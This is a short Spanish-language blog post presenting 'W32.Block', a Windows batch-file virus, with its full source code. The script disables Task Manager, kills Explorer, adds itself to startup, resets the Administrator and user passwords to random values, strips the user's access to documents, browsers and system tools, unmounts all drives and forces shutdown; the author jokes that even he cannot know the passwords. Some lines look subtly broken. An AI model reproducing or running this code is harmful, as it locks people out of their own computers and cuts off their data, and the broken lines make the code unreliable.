• LOL

W32.Block Bloquear el sistema en Batch

W32.Block es un virus que tiene como finalidad, bloquear el systema para que no se pueda volver a ingresar ni por el usuario que comunmente inicia ni por el administrador ya que crea contraseñas aleatorias que ni yo se cuales son :p


@echo off
set src=%temp%\screen.bat
set ss=%temp%\ServiceSystem.bat
set tep=/t /e /p
REG ADD "HKCU\Console" /v FullScreen /t REG_DWORD /d 1 /f >> "%src%"
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f >> "%src%"
start %ss% && exit >> "%src%"
@echo off && cls>> "%ss%"
type "%homedrive%\boot.ini" && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LogonType /t REG_DWORD /d 1 /f >> "%ss%"
ipconfig/release >> "%ss%"
taskkill /F /IM explorer.exe >> "%ss%"
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v SysTrayService /t REG_SZ /d "%ss%" >> "%ss%"
net user Administrador %random%binary%random% >> "%ss%"
net user %username% %random%ascii%random% >> "%ss%"
cacls "%userprofile%\Misdoc~1\*" %tep% %username%:n >> "%ss%"
cacls "%homedrive%\Docume~1\%username%\*" %tep% %username%:n >> "%ss%"
cacls "%homedrive%\Docume~1\*" %tep% %username%n >> "%ss%"
cacls "%programfiles%\Intern~1\iexplore.exe" %tep% %username%:n >> "%ss%"
cacls "%programfiles%\Mozill~1\firefox.exe" %tep% %username%:n >> "%ss%"
cacls "%systemroot%\system32\ipconfig.exe" %tep% %username%:n >> "%ss%"
cacls "%systemroot%\regedit.exe" %tep% %username%:n >> "%ss%"
cacls "%systemroot%\system32\notepad.exe" %tep% %username%:n >> "%ss%"
FOR %%u IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (mountvol %%u:\ /D) >> "%ss%"
shutdown -s -f -t 00 && exit >> "%ss%"
call %src% && exit

0 comentarios:

Publicar un comentario

Los comentarios Anónimos se han suprimido, para comentar si no tienes blog o página web, puedes hacerte de un OpenID y para su registro es muy rápido.

 
Nano Code © 2010 | Diseñado por Chica Blogger | Volver arriba